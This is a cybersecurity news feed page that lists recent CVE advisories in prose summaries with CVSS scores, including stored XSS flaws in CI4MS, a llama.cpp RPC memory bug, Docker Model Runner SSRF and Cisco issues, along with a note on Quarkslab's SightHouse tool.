Subscribe, build a custom feed, or pitch a sponsorship at hello@acadenix.com
Latest intel// live feed
CVE-2026-34570 — Ci4-cms-erp Ci4ms: This behavior breaks the intended access control policy and results in persistent unauthorized access.
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to immediately revoke active user sessions when an account is deleted. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions. The system implicitly assumes that authenticated users remain trus CVSSv3.1 8.8 (HIGH)
CVE-2026-34569 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely across public-facing blog category pages, administrative interfaces
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog categories. An attacker can inject a malicious JavaScript payload into the category title field, which is then stored server-side. This stored payload is later rendered unsafely across public-facing blog category pag CVSSv3.1 9.9 (CRITICAL)
CVE-2026-34568 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely in multiple application views without proper output
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog posts. An attacker can inject a malicious JavaScript payload into blog post content, which is then stored server-side. This stored payload is later rendered unsafely in multiple application views without proper outpu CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34567 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely when the Categories are viewed via blog
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog posts within the Categories section. An attacker can inject a malicious JavaScript payload into the Categories content, which is then stored server-side. This stored payload is later rendered unsafely when the Catego CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34566 — Ci4-cms-erp Ci4ms: These stored values are later rendered without proper output encoding across administrative page lists
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Page Management functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side. These stored values are later rendered without proper output encoding acros CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34565 — Ci4-cms-erp Ci4ms: These stored values are later rendered unsafely within administrative dashboards and public-facing navigation menus
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when adding Posts to navigation menus through the Menu Management functionality. Post-related data selected via the Posts section is stored server-side and rendered without proper output encoding. These stored values are later rendered unsafely w CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34564 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely within administrative interfaces and public-facing navigation menus
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when adding Pages to navigation menus through the Menu Management functionality. Page-related data selected via the Pages section is stored server-side and rendered without proper output encoding. This stored payload is later rendered unsafely wi CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34563 — Ci4-cms-erp Ci4ms: An attacker can inject a malicious JavaScript payload into the backup filename via the
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when handling backup uploads and processing backup metadata. An attacker can inject a malicious JavaScript payload into the backup filename via the uploaded xss.sql, which uses SQL functionality to insert the XSS payload server-side. This stored CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34560 — Ci4-cms-erp Ci4ms: If any stored XSS payload exists within logged data, it is rendered without proper
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within logged data, it is rendered without proper output encoding. This issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored wit CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34559 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely across public tag pages and administrative interfaces
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog tags. An attacker can inject a malicious JavaScript payload into the tag name field, which is then stored server-side. This stored payload is later rendered unsafely across public tag pages and administrative interfa CVSSv3.1 9.1 (CRITICAL)
SightHouse: Automated function identification
Quarkslab released SightHouse, an open-source tool for automated function identification and binary similarity analysis. The tool integrates with IDA Pro, Ghidra, and Binary Ninja to identify known functions across binaries by querying a signature database built on BSIM, and includes an automated pipeline for signature extraction from compiled projects.
CVE-2026-4101 — Ibm Security_verify_access: Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container
IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 under certain load conditions could allow an attacker to bypass authentication mechanisms and gain unauthorized access to the application. CVSSv3.1 8.1 (HIGH)
CVE-2026-34873 — Arm Mbed_tls: An issue was discovered in Mbed TLS 3.5.0 through 4.0.0.
An issue was discovered in Mbed TLS 3.5.0 through 4.0.0. Client impersonation can occur while resuming a TLS 1.3 session. CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34528 — Filebrowser Filebrowser: Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via
File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default CVSSv3.1 8.1 (HIGH)
CVE-2026-34748 — Payloadcms Payload: Prior to version 3.78.0 in @payloadcms/next, a stored Cross-Site Scripting (XSS) vulnerability existed in
Payload is a free and open source headless content management system. Prior to version 3.78.0 in @payloadcms/next, a stored Cross-Site Scripting (XSS) vulnerability existed in the admin panel. An authenticated user with write access to a collection could save content that, when viewed by another user, would execute in their browser. This issue has been patched in version 3.78.0. CVSSv3.1 8.7 (HIGH)
CVE-2026-34747 — Payloadcms Payload: Prior to version 3.79.1, certain request inputs were not properly validated.
Payload is a free and open source headless content management system. Prior to version 3.79.1, certain request inputs were not properly validated. An attacker could craft requests that influence SQL query execution, potentially exposing or modifying data in collections. This issue has been patched in version 3.79.1. CVSSv3.1 8.5 (HIGH)
CVE-2026-34875 — Arm Mbed_tls: A buffer overflow can occur in public key export for FFDH keys.
An issue was discovered in Mbed TLS through 3.6.5 and TF-PSA-Crypto 1.0.0. A buffer overflow can occur in public key export for FFDH keys. CVSSv3.1 9.8 (CRITICAL)
CVE-2026-34236 — Auth0 Auth0-php: From version 8.0.0 to before version 8.19.0, in applications built with the Auth0 PHP
Auth0-PHP is a PHP SDK for Auth0 Authentication and Management APIs. From version 8.0.0 to before version 8.19.0, in applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies. This issue has been patched in version 8.19.0. CVSSv3.1 8.2 (HIGH)
CVE-2026-34159 — Ggml Llama.cpp: Combined with pointer leaks from ALLOC_BUFFER/BUFFER_GET_BASE, this gives full ASLR bypass and remote code
llama.cpp is an inference of several LLM models in C/C++. Prior to version b8492, the RPC backend's deserialize_tensor() skips all bounds validation when a tensor's buffer field is 0. An unauthenticated attacker can read and write arbitrary process memory via crafted GRAPH_COMPUTE messages. Combined with pointer leaks from ALLOC_BUFFER/BUFFER_GET_BASE, this gives full ASLR bypass and remote code execution. No authentication required, just TCP access to the RPC server port. Th CVSSv3.1 9.8 (CRITICAL) · EPSS 35th percentile
CVE-2026-34072 — Fccview Cronmaster: Prior to version 2.2.0, an authentication bypass in middleware allows unauthenticated requests with an
Cr*nMaster (cronmaster) is a Cronjob management UI with human readable syntax, live logging and log history for cronjobs. Prior to version 2.2.0, an authentication bypass in middleware allows unauthenticated requests with an invalid session cookie to be treated as authenticated when the middleware’s session-validation fetch fails. This can result in unauthorized access to protected pages and unauthorized execution of privileged Next.js Server Actions. This issue has been patc CVSSv3.1 8.3 (HIGH) · EPSS 27th percentile
CVE-2026-33990 — Docker Model_runner: Prior to version 1.1.25, Docker Model Runner contains an SSRF vulnerability in its OCI
Docker Model Runner (DMR) is software used to manage, run, and deploy AI models using Docker. Prior to version 1.1.25, Docker Model Runner contains an SSRF vulnerability in its OCI registry token exchange flow. When pulling a model, Model Runner follows the realm URL from the registry's WWW-Authenticate header without validating the scheme, hostname, or IP range. A malicious OCI registry can set the realm to an internal URL (e.g., http://127.0.0.1:3000/), causing Model Runner CVSSv3.1 9.1 (CRITICAL)
CVE-2026-33949 — Ssw Tinacms\/graphql: Prior to version 2.2.2, a path traversal vulnerability in @tinacms/graphql allows unauthenticated users to
Tina is a headless content management system. Prior to version 2.2.2, a path traversal vulnerability in @tinacms/graphql allows unauthenticated users to write and overwrite arbitrary files within the project root. This is achieved by manipulating the relativePath parameter in GraphQL mutations. The impact includes the ability to replace critical server configuration files and potentially execute arbitrary commands by sabotaging build script. This issue has been patched in ver CVSSv3.1 8.1 (HIGH)
CVE-2026-30643 — Dedecms Dedecms: An issue was discovered in DedeCMS 5.7.118 allowing attackers to execute code via crafted
An issue was discovered in DedeCMS 5.7.118 allowing attackers to execute code via crafted setup tag values in a module upload. CVSSv3.1 9.8 (CRITICAL)
CVE-2026-20160 — Cisco Smart_software_manager_on-prem: A vulnerability in Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated
A vulnerability in Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected SSM On-Prem host. This vulnerability is due to the unintentional exposure of an internal service. An attacker could exploit this vulnerability by sending a crafted request to the API of the exposed service. A successful exploit could allow the attacker to execute commands o CVSSv3.1 9.8 (CRITICAL) · EPSS 56th percentile
CVE-2026-20155 — Cisco Evolved_programmable_network_manager: A vulnerability in the web-based management interface of Cisco Evolved Programmable Network Manager (EPNM)
A vulnerability in the web-based management interface of Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker with low privileges to access sensitive information that they are not authorized to access. This vulnerability is due to improper authorization checks on a REST API endpoint of an affected device. An attacker could exploit this vulnerability by querying the affected endpoint. A successful exploit could allow the attac CVSSv3.1 8.0 (HIGH) · EPSS 19th percentile